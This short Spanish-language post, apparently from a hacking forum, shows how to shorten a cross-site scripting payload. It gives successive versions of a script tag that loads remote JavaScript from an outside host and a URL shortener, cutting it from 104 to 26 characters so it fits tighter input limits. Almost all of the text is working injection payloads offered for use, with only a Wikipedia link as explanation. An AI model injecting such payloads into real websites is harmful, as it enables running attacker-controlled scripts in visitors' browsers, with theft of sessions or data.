#; Acortar Link de Attaque XSS!

1. Acortar ataque "XSS" = Cross-site Scripting
2.  
3. Que es este ataque y como funciona?
4.  
5. [+] http://es.wikipedia.org/wiki/Cross-site_scripting
6.  
7. XSS Original!
8.  
9. <script type="text/javascript" src="http://www.zff.co/Webservices/jsParseLinks.aspx?id=xxxxxx"></script>
10. 104 Caracteres
11.  
12. XSS shortener 1: (Sacamos type="text/javascript")
13. <script src="http://www.zff.co/Webservices/jsParseLinks.aspx?id=xxxxxx"></script>
14. 81 Caracteres
15.  
16.  
17. XSS shortener 2: (Con url shortener http://f.nu/)
18. <script src="http://www.f.nu/XXX"></script>
19. 43 Caracteres
20.  
21. XSS shortener 3: (Sacamos http: y www y solo dejamos solo //)
22. <script src="//f.nu/XXX"></script>
23. 34 Caracteres
24.  
25. XSS shortener 4: (Sacamos </script> y agregamos "/> )
26. <script src="//f.nu/XXX"/>
27.  
28. Llege a 26 Caracteres, Se puede mas?